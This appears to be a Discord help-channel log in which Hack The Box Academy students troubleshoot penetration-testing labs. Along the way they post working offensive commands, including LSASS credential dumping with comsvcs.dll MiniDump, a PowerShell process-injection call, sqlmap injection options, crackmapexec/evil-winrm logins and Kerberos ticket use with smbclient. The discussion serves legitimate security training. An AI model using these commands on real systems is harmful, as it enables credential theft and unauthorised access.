Import-Module .\Invoke-PSInject.ps1
Invoke-PSInject -ProcId 2408 -PoshCode "V3JpdGUtSG9zdCAiSGVsbG8sIEd1cnU5OSEi"
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Try the new cross-platform PowerShell https://aka.ms/pscore6

anyonje know why this isn't workjing? been stuck for so long lol

sqlmap -u "http pwnbox address/case9.php?id=1&uid=(whatever burp captured)" --random=(parameter that needs to be randomized) -v 5 | grep URI

did u try -p 'id'?

no, ill try that

Yes and they either time out or give network error

Ik I could just encode and decode the file but cmon im supposed to become a hacker how tf is it possible I can't transfer a fucking file

Time out, always time out

But pings work

I've had no issues with transferring with xfreerdp

Guys, all modules up to (including) Tier II" should be unlocked for Student Plan?

yes

That's what it says on the tin

that file is way too big for encoding

Scp always times out or gives network error or says the file has been transferred but it hasn't

Scp as well I'm able to find the file

Sounds like your vpn may not be stable

I changed like 3

I generally use the tcp vpn download file

Instead of udp

what module is this?

But I still have a qube-based account with 50 qubes that I took when I created the account Today, I paid $8. Does it take time to unlock modules?

no every T0-T2 modules are unlocked for you

it won't ask for cubes

Pentester path, password attacks, attacking lsass

that windows machine has ssh on it?

cant you just use impacket-smbserver

But now I want to start the module tier 2 with 100 Qubes and tell me I have to go bill and purchase Qubes.

does your dashboard look like this?

Yes, exactly.

which module are you trying to start?

still getting the same issue

Idk dude, it seems like this machine wants to make me angry. i dumped the lsass through the given command, did "dir c:\lsass.dmp" and i could see the file. Now I resetted the machine and vpn, did the same command with the same id and now I can't see the file.
Two hours ago I used scp to transfer the lsass.dmp and it didn't say time out , I couldn't find the file on my kali VM but it didn't say time out. Now it does

the machine doesnt have ssh tho

Which subscription do you have under your name?

use xfreerdp drive share to transfer

i just did it with impacket-smbserver and used "move lsass.dmp \ip\share"

Let me check

did you remove grep URI?

you also dont need verbose level to 5 here

verbose to 2 or 3?

i used "-p 'id' --randomized=(paramter) --batch"

thats it

okay ill try that

got the flag, had to add --dump to the your command

I am using remmina with file transfer, I can see the shared folder but after I dumped lsass I can't see the file. Also commands to check where the file is don't give results

what did you dump it with?

im pretty sure its in the htb-student/appdata/local/temp if you used task manager

You can definitely bruteforce Johanna

Try the resources wordlist and mutated

Rundll32 c:\windows\system32\comsvcs.dll, MiniDump 660 c:\lsass.dmp full

This command was done users\htb-student\desktop because I thought to save the output in the same directory

But it's not there, also I tried -o lsass.dmp at the end but also can't find it

...

bro

It's not in c:\

I looked there

Yes it's not there I checked again

make your own dir then put it there

No

Mutated should work, you can use more threads on some services

I tried it's not there, when I run the dump command it doesn't give me error or anything tho

Try and see

Plenty of services to potentially attack as well

Nxc can attack some as well

@fathom pendant what do I do? I can't find lsass.dmp

module: WINDOWS LATERAL MOVEMENT

section:Server Message Block (SMB)

question: Use PsExec to get a shell as Helen on SRV02 and read the flag located at C:\Flags\helensonly.txt
Link:https://academy.hackthebox.com/module/263/section/3085.

Description, i was able to get shell on srv02 but i cant get the flag, it says access denied

Dump it to a place you can write to first.
Then transfer that to your device idk what else to tell you tbh.

what is this nxc?

Netexec, it's like crackmapexec, but better

I used crowbar for brute force rdp, I’ll try Netexec for smb if I understood correctly

Or other services like winrm

Hey guys little question, on the screen the as sysdba is it like using a command with sudo?

or is it like connecting with the admin acc to scot's acc?

Hey! Something which I cannot explain is happening in BURP. Working through https://academy.hackthebox.com/module/136/section/1290 and fuzzing the file upload request. The first time I send a request to repeater and execute it - I get a "File successfully uploaded" response, same as in the captured response in the Proxy tab. From the second request and on, the Content-Length header gets updated from 912 to 1133 and the response I get is "Only images are allowed". Note that I am not changing one bit from the initial successful payload. I disabled the "Update Content-Length" but that fails as the server returns 400 Bad Request. It really seems like BURP is adding something to my payload. It gets even weirder - if I am switched to the "HEX" view in Repeater I can send the request multiple times, the payload is not modified and I am getting the expected response "File successfully uploaded". I am using latest version of Burp - v2024.7.5

might just have to use the task manger method

As system database admin

Meaning you're logging in as the highest administrative account on the database

can i consider then that the pwd is tiger to for sysdba? Or is it just a security issues on this case that i can connect as sysdba?

With sqlplus it's user/pass

as is like impersonation (if the user has the relevant role to)

yes i understand this but i mean its weired that you can log in with a regular user acc and have the higest priv just by adding as sysdba

Because the user in question might be an admin on that machine

so this have to be done by the administrator? i mean scot has to be in a kind of list thats allows him to log like this?

Ow okej

thank you

You can't do it for all users

Just the ones that can

do you know a tool for tns enumeration? I used the script of htb for odat but i receive a lot of error its a little bit overwhelming ^^

Odat is the only tool I know of so far

Run the install script line by line instead of as a script

It's really dumb

And skips over certain things

okej gonna try

so, in the server-sides attack module (skills assessment part), i just did a LFI to get /flag.txt and it worked. I don't know if the lab is really this easy or were i supposed to do some different steps to get the flag :/

anyone here done HTTP Response splitting?

module?

stuck on it for hours now

Great question

The effort you put into the question equates to the effort put into the answer

lol, just dont want to start typing out what i've done here, because it contains spoilers

hard to not spoil it, when its different stuff binded

sure but you can do that without spoilers like for example what part of the module you are on etc.

and thats why i asked if anyone done it, so i could then ask if i could dm them

i said that

HTTP Response Splitting

in the module HTTP Attacks

It wasn't clear that was the module you were working on

I'm trying to figure out the debian codename that underpins my parrot install. This is so i can specify the right apt repo for docker installation

so i can then install bloodhound CE 🙂

Natural reading assumes "HTTP response splitting" is the module name

Bullseye

ah thank u

It's based on latest deb stable == bullseye

in the usual places /etc/os-release i could only see the parrot code name lory

Hey why cant I type inside of the general chat also does anyone want to work together as study buddies with my friend and I

yeah i get that, but i recon most people who have done http splitting has done http attacks module. Even so, no problem to answer with a question about what module it is

read and follow #welcome

yes because the releases is based on the OS distribution not the underlying kernel

you're free to make a post in #1225791307256168448 to look for study buddies after following #welcome

Thanks guys

Very helpful

thx.... sometimes in other debian based distros you can find the debian codename tho

Why is it that every few weeks I need to delete my Kali Linux VM and download a new one otherwise it works weird? Many programs aren't working properly idk what's going on but when it's freshly installed i usually don't have this issue

Like pypykatz, it's been running for like 1 hour and still hasn't outputted anything

sounds like something is up with your install method then if it's failing every few weeks

or your assigned resources

¯_(ツ)_/¯

Wdym install method?

i.e. something is up with your virtualization software

OR the assigned resources can't be handled properly by the host

or somehow in some way it's just not doing what it needs to

I mean I have VMware 7

Is there any way to test it?

¯_(ツ)_/¯

sounds like some weird creeping issue that takes around 2 weeks to show

but i don't have experience with VMware

i use virtualbox personally, that's because at the time it was the free alternative to VMware (still won't migrate to VMWare because Broadcom and PII)

Anyone else have this problem with VMware 7?

Hey guys, im doing the last lab for FIle Uploads module, i can upload a shell but how do i find the uploads directory? The hint says look at the source code and naming conventions but im having trouble finding it?

find a way to pull the source code, everything you learned from the module is applicable

Can a mod or staff answer this?

can i ask something?

Can u just take a healthy snapshot and revert back whenever you feel it weird?

answer what?

my points havent updated since yesterday.Any tip?

it has happened to me 2 times

you mean on main labs?

on machines yes

that's not an academy question --> #1024429874246590575 if you want to ask there

https://help.hackthebox.com/en/articles/5986762-contacting-htb-support

if you want to reach out to support to ask them ^

ok thanks a lot

could i ask, if i dont know the uploads directory, i can't get execution of my uploaded file right?

About to hit first module practice lab, this bloody CPTS is so addictive and I haven’t actually started to hack just yet!

again you don't need the uploads directory to find something that works

see: limited file uploads potentially for something you can do

yeah im thinking xxe injection but how would i get the source code of the file; im just curious how the backend is working here

this is ofc after fuzzing for viable extensions and image/ types

the Limited File Uploads section shows what you can do; in burp you can catch the response so you can grab what you need from there

think back to what you had to do for the 2nd question of that section; and try and figure out from there what you need to do

there's nothing on the skill assessment that wasn't covered by the module

I am in the containerization module and cannot get any container to run. The containers show up on the lxc list but can't get them to budge. I get a ../src/lxc/tools/lxc_start.c: main: 266 No container config specified. I have looked for hours through Google but I have not found anything that works. If someone could point me in the right direction I would appreciate it. I am running Ubuntu 24.04 LTS and have LXD and LXC utils installed. Docker works fine but not Linux containers.

ahh i see what i was doing wrong, i was spoofing the magic bytes but that was messing with the xml execution. and it was getting executed because the image would get displayed in the UI. Ok i think i need to rest and do these lol. Thank you so much 🙂

love that answers not the given so easily here

module link? i don't recall a containerization module

don't need magic bytes for xml :)

This is the link to the module, it's in the Linux basics track.https://academy.hackthebox.com/module/18/section/2097

Sorry Linux Fundamentals

you don't need to do anything in that section, those are just optional things

also the Module Name is Linux Fundamentals it's not a path

Academy is broken down as follows:
Paths - A collection of Modules
Module - A learning material that covers a specific topic or small range of topics
Section - A specific chapter/page in a module that generally teaches a specific thing about the module topic

Thank you for the clarification, I'll just move on then. Thanks for the quick reply

the 2 major things that will help others help you is the Module Name and Section Name; alongside what you've tried

also with that error, it's looking for a specific configuration to run and virtualize

https://stackoverflow.com/questions/62594865/lxc-startno-container-config-specified

I will be sure to ask better questions next time. Thank you again for explaining the paths, modules and sections as well as the link.

if you visit http://dontasktoask.com there's some links to some resources that explains different question strategies and types

like https://xyproblem.info

Using mimikatz you can find the password of a user

dude that post was a little over a month ago LMAO

you can use mimikatz or other techniques to dump info

what modules go over must know stuff for pen testing

well a lot is covered in the Penetration Tester Job Role Path

at least the bare minimum to consider when doing it; your methodology for moving forward is to be developed as you learn more

I am stuck on Injection Attacks Skill Assessment. I am in the last part but need a little nudge to get the flag.

command injection module?

Injection Attacks module

from CWEE

ah

mb

silly me

no worries 😄

you can DM me

Vulnerability assessment module is so boring

💀

(skip it)

just kidding

yeah i didn't even use vuln scanning tools for AEN (but i can understand their use)

generally those vuln scan tools are good if you really just need a "random bullshit go" option to find vulns

I really need to speed run this module tbh I'm gonna finish it today

the scans are preloaded onto the targets

at their respective https://IP:<port> replacing <port> with the relative tool port

I'm having trouble with loading a target for module : Attacking Common Apps - Gitlab

By loading target do you mean it's not spawning?

If so: change vpn regions and try spawning a new target

yes, it's just spinning

okay

You'll need to download a new vpn to use

that worked! thanks alot

hi on the network services section of password attacks module I am trying to use evil-winrm and crackmapexec with winrm protocol specification to crack passwords. I have a login creds file on the pwnbox's desktop. crackmapexec with that username and password specified in that file doesn't work. I think the target is vulnerable to WinRM because I tested it. Is the my_credentials.txt file not the right file?

└──╼ [★]$ crackmapexec winrm  10.129.139.246 -u htb-ac-605555  -p 5JLHdfBK
WINRM       10.129.139.246  5985   WINSRV           [*] Windows 10 / Server 2019 Build 17763 (name:WINSRV) (domain:WINSRV)
WINRM       10.129.139.246  5985   WINSRV           [-] WINSRV\htb-ac-605555:5JLHdfBK

└──╼ [★]$ sudo evil-winrm -i 10.129.139.246 -u htb-ac-605555 -p 5JLHdfBK
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
                                        
Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError
                                        
Error: Exiting with code 1

evil winrm won't work and neither will crackmapexec

this is for question 1 of the network services section

do I use hydra?

Thank you for posting this, saved me a headache and a half🍻

I’m pretty sure thats ur pwnbox credentials

I can tell from the name, only see names like that on the pwnbox

Hey

Hey this is a newbie question. I got kali in vm and when i tried to ssh from it, it keeps timing out

Btw your output has [-] which in cme/nxc terms means failed

Are you connected to the vpn?

nope!

And the firewall is off

Even windows command prompt timeout

where is the username and passwords file I need to use for the attack then?

where is the username list and password list?

I mean because that has to be the issue no?

Did you check resources?

On the webpage?

oh its on the section web page thanks ok

need some help with SQLmap Skill Assessment. I'm looking through the website and I'm trying to use sqlmap on the parts of the page that I think are the attack vectors. However, sqlmap is returning that nothing seems to be injectable. Just need a point in the right direction

This is a shop page yeah?

yes

Open devtools --> network tab and click on everything even on another page you can navigate to until you get the request

The website is nice enough to give a popup that tells you that you did a thing 😉

okay, thank you

Ffffff that pivot module assessment

i have mixed feelings lol it was cool, but... man what a janky connection

where i can find chat for season lab?

yea, not a fan of working through proxychains. I've got to do that again with ligolo.

#1282037109066039319 you need to link your account to see it

See: #welcome for instructions

Yeah..... not great tbh

Other than ligolo are there any recommendations to make that less brutal?

Ligolo makes it cake

¯_(ツ)_/¯

Great, i'll work on that before moving on then.

I am on the last question of network services section of password attacks module. I have found which user is the SMB user. The thing is I am struggling to get the right command to log into the SMB share. I look at the command in the section and I copy the exact command but replace the IP with IP of target and I found the various SMB shares but that doesn't work because one SMB share is read permission only but it won't matter because I try to access that because it gives me the same error even when I log in with the right user:

Failed to open /var/lib/samba/private/secrets.tdb
_samba_cmd_set_machine_account_s3: failed to open secrets.tdb to obtain our trust credentials for WORKGROUP
Failed to set machine account: NT_STATUS_INTERNAL_ERROR

I tried the WORKGROUP share as well even tho that's not one of the SMB shares but I tried to every SMB share that existed including the one the SMB user had read permissions for.

What am I doing wrong here? I would post my commands but I'm scared it will be marked as a spoiler.

Yeah, ligolo

Are you sure you found the smb user and what's your command to log in?

That's an odd error being listed

WORKGROUP == local windows auth

Remove -p

yeah sounds like an error with the box tbh

but we don't know for sure without knowing what you did

I closed the pwnbox and the target because I am gonna try again and ask you guys later if I still have trouble.

but yes I am sure it confirmed the login

I got the green + next to the user and password

I will dm you the user

and their password

so you can tell me if that's the right user

I just dmed it to @fathom pendant

user error; all users for this lab are unique

if you list the shares; you can what may be a name 😉

that is your only hint for it

did you use the -P flag

if so, remove it and let smbclient prompt you for the password

ok I got the right user I will dm marcie lee with my latest terminal output and command

ok I finished the section

it went quite well. thank you @fathom pendant for your hint

I'm psyched to say this is going well

me: wondering why a page won't load... then noticing that the burp proxy was on... smhmyhead

ha ya

i complained about this on their support forum, i said that there should be a big switch or some type of color or button on the greater burp GUI to be able to turn on/off the intercept.. they told me to use the hotkey combo (doesnt really work 100% of the time if you're hoping from VM to VM or if you're just forgetful) they didnt see it as a problem. This happens to me everday, so frustrating.

Also it takes 2-3 clicks to get to/from the intercept on/off button back to/from where you were previously and it should require less effort than that... I think even ZAP has a globally accessible intercept switch if i remember correctly.

just say what section you're on. i don't recall any of that.

It still gets stuck just having foxy proxy on burp, even if burpsuite is closed

yeah thats the other part right? cant do much about that tho

I'd suggest avoiding posting spoilers for the AEN module (yes even behind spoiler text as spoiler text does nothing)

Lateral movement section in AEN

i also did it blind, so i didn't refer to the reading or writeup for this

is your file saved as an executable file in the directory

It's nothing that hasnt been said before in this chat

Search feature of discord is wonderful

i'm aware

but many people do this module blind

other people murder so it's ok for me too

and a lot of what you said was way too spoiler rich

Lmao yikes

either way

Nevermind

make sure you have everything set properly for it to execute

yeah i'd look into that weird character you added, the section says nothing about that so you probably didn't do it 'exactly like the module says'

i'm going back through it again to regather some screenshots to write a report up

annoying af when the spawn doesn't spawn a certain Internal Host

That's so odd. I respawn the machine at least 10 times a month ago following the steps, and got the same issue every time. I've respawned 4 times tonight, and on the 4th spawn the odd character is no longer there. Same exact steps every time

So goofy

Module: Password attacks
section: Pass the ticket from Linux
Question: Check the /tmp directory and find Julio's Kerberos ticket (ccache file). Import the ticket and read the contents of julio.txt from the domain share folder \DC01\julio.
I can launch the command smbclient //dc01/C$ -k -c ls -no-pass but i don't find a way to read the julio.txt file

so you can type and get a successful response back in the terminal?

-c executes a command then exits

sorry to ask this n00b question but does anyone else here experience the issue of nc listening but being unable to actually connect

Can't say I do

I did try smbclient //dc01/julio/julio.txt$-k -c cat -no-pass but it doesn't working, i have to try to cd and pipe tho

there are a lot of things wrong with that syntax

May i dm you SuperNuts ?

ok

Module: Attacking Common Applications
Section: Attacking Gitlab
Link to section: https://academy.hackthebox.com/module/113/section/1217

Find another valid user on the target GitLab instance.

I managed to find quite a few usernames, including the one that is the answer to the question, however, it took a VERY long time.

Was it supposed to take that long? I used the wordlist (||/usr/share/seclists/Usernames/xato-net-10-million-usernames.txt||). The answer was ||near the end of the list, somewhere in the 7 millions||.

anyone stuck on the getting started knowledge check?

no

did you need help or something?

yeah, not finfing the contents of user.txt for some reason when i run a scan and try to gain a foothold. this is the question "Spawn the target, gain a foothold and submit the contents of the user.txt flag."

if I recall this one is silly and it's user.txt.txt

Or I'm forgoring my modules

Ah

Because it's not in the directory you're dropped in

A super simple command you can run: find / -name "user.txt" -exec cat {} \; 2> /dev/null

Generally a user.txt is gonna be in a user's home

thank you i'll try that once my lab comes back up! it failed and closed

www-data isn't a standard user

Doesn't stop you from finding one though

Hello everyone. I'm doing sqlmap course and I've frezze in the final test, could anyone please help me with my issue?

hi i was just wondering how do i access nessus on the pwnbox it says service not installed but in the assessment it says its installed

I believe I mentioned this way earlier

It's on the https://[targetip]:nessusport

yea i got it i had restart the target machine

it wasnt working for some reason

did you specify http instead of https? I did that

oh lol

btw why are we launching the nessus on the target machine tho

cant we just mention the target IP on the pwnbox machine after nessus is installed and perform a scan like that

No

As the actual scan targets are on an internal network

For the sake of headache as well, there's already pre-run scans

hello

Hi

how do i verify scarlet

?

?

Wdym

its an app

that has hacks for mobile

This ain’t the place for this

Are students still provided discounts?

Yes, have a look here https://help.hackthebox.com/en/articles/7973133-getting-the-student-subscription

Cool